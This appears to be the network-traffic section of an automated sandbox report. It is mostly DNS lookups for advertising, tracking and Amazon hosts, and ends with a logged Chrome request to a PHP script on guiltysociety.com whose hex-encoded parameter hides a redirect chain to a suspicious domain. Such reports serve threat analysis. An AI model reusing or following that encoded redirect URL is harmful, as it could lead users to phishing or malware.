                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.248.194.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com79.125.42.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.73.56.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com99.81.94.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.247.247.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.853919029 CEST1.1.1.1192.168.2.50xa510No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.78.78.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.927937031 CEST1.1.1.1192.168.2.50xc0b4No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:10.927937031 CEST1.1.1.1192.168.2.50xc0b4No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.162702084 CEST1.1.1.1192.168.2.50x333bNo error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.197983980 CEST1.1.1.1192.168.2.50x783eNo error (0)bs.serving-sys.combs.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.197983980 CEST1.1.1.1192.168.2.50x783eNo error (0)aka-fr.ads.sizmdx.comadserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.197983980 CEST1.1.1.1192.168.2.50x783eNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com3.121.49.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.197983980 CEST1.1.1.1192.168.2.50x783eNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com35.158.83.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.197983980 CEST1.1.1.1192.168.2.50x783eNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com3.120.103.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)cookie-matching.mediarithmics.comlb.mediarithmics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.674648046 CEST1.1.1.1192.168.2.50x3892No error (0)lb.mediarithmics.com54.36.150.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.711920023 CEST1.1.1.1192.168.2.50x50d4No error (0)cm.g.doubleclick.net142.250.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:11.713422060 CEST1.1.1.1192.168.2.50xd7a9Name error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com34.1.230.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.191.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.222.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com34.1.224.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.214.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com34.1.228.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.233.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.193.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.232.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.181910992 CEST1.1.1.1192.168.2.50x9033No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.150.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.185565948 CEST1.1.1.1192.168.2.50x70beNo error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.185565948 CEST1.1.1.1192.168.2.50x70beNo error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.235799074 CEST1.1.1.1192.168.2.50xba60No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.235799074 CEST1.1.1.1192.168.2.50xba60No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.355674028 CEST1.1.1.1192.168.2.50x68a8No error (0)lm.serving-sys.comlm.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.355674028 CEST1.1.1.1192.168.2.50x68a8No error (0)aka-lm-fr.ads.sizmdx.comadserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.355674028 CEST1.1.1.1192.168.2.50x68a8No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com18.196.77.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.355674028 CEST1.1.1.1192.168.2.50x68a8No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com3.77.62.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.355674028 CEST1.1.1.1192.168.2.50x68a8No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com52.28.91.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.633549929 CEST1.1.1.1192.168.2.50xfd73No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.633549929 CEST1.1.1.1192.168.2.50xfd73No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:12.633549929 CEST1.1.1.1192.168.2.50xfd73No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.149307966 CEST1.1.1.1192.168.2.50x8310No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.149307966 CEST1.1.1.1192.168.2.50x8310No error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.149307966 CEST1.1.1.1192.168.2.50x8310No error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.703573942 CEST1.1.1.1192.168.2.50x1a98No error (0)crb.kargo.com54.93.149.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.703573942 CEST1.1.1.1192.168.2.50x1a98No error (0)crb.kargo.com3.74.116.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.703573942 CEST1.1.1.1192.168.2.50x1a98No error (0)crb.kargo.com18.192.81.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.802417040 CEST1.1.1.1192.168.2.50xb249No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.802417040 CEST1.1.1.1192.168.2.50xb249No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:13.802417040 CEST1.1.1.1192.168.2.50xb249No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:14.796168089 CEST1.1.1.1192.168.2.50x44cfNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:14.796168089 CEST1.1.1.1192.168.2.50x44cfNo error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:14.796168089 CEST1.1.1.1192.168.2.50x44cfNo error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.225718021 CEST1.1.1.1192.168.2.50xeebcNo error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.225718021 CEST1.1.1.1192.168.2.50xeebcNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.225718021 CEST1.1.1.1192.168.2.50xeebcNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.225718021 CEST1.1.1.1192.168.2.50xeebcNo error (0)load-euw1.exelator.com54.78.254.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.227600098 CEST1.1.1.1192.168.2.50x6b64No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.227600098 CEST1.1.1.1192.168.2.50x6b64No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:15.322525978 CEST1.1.1.1192.168.2.50x4eb4No error (0)completion.amazon.com44.215.128.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.005249023 CEST1.1.1.1192.168.2.50x94a8No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-amazon.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.211.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.49.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.212.125.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.155.255.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.208.109.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.297331095 CEST1.1.1.1192.168.2.50x6e2fNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.77.55.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:16.485634089 CEST1.1.1.1192.168.2.50xbf87No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.194000959 CEST1.1.1.1192.168.2.50x964fNo error (0)sync.sxp.smartclip.net35.186.194.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.196253061 CEST1.1.1.1192.168.2.50x6ec2No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.196253061 CEST1.1.1.1192.168.2.50x6ec2No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:17.196253061 CEST1.1.1.1192.168.2.50x6ec2No error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:23.167335987 CEST1.1.1.1192.168.2.50x3d12Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:24.154887915 CEST1.1.1.1192.168.2.50xef92No error (0)ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net18.172.223.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:24.154887915 CEST1.1.1.1192.168.2.50xef92No error (0)ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net18.172.223.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:24.154887915 CEST1.1.1.1192.168.2.50xef92No error (0)ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net18.172.223.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:24.154887915 CEST1.1.1.1192.168.2.50xef92No error (0)ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net18.172.223.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:34.986902952 CEST1.1.1.1192.168.2.50x5b03No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:29:39.932473898 CEST1.1.1.1192.168.2.50x8c23Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.229.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.246.179.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.113.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.73.239.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.210.22.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.195.47.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.250.237.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:00.431308985 CEST1.1.1.1192.168.2.50x4447No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.246.92.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:02.490787983 CEST1.1.1.1192.168.2.50x68e3No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:26.648972034 CEST1.1.1.1192.168.2.50x4a9fNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:26.648972034 CEST1.1.1.1192.168.2.50x4a9fNo error (0)tp.c9a5976c7-frontier.amazon.aewww.amazon.ae.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.691149950 CEST1.1.1.1192.168.2.50x6b24No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.691149950 CEST1.1.1.1192.168.2.50x6b24No error (0)unagi-eu.amazon.com67.220.226.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.691519976 CEST1.1.1.1192.168.2.50x6b24No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:30:31.691519976 CEST1.1.1.1192.168.2.50x6b24No error (0)unagi-eu.amazon.com67.220.226.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.246.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.14.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.187.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.171.6.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.252.147.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.48.222.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.18.38.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:03.413757086 CEST1.1.1.1192.168.2.50x1830No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.64.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:05.930555105 CEST1.1.1.1192.168.2.50xd942No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:31:05.930555105 CEST1.1.1.1192.168.2.50xd942No error (0)tp.c9a5976c7-frontier.amazon.aewww.amazon.ae.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      0192.168.2.54971069.49.245.1724432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:30 UTC606OUTGET /sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinian HTTP/1.1
                                                                                                                                                                                                                                                                      Host: guiltysociety.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
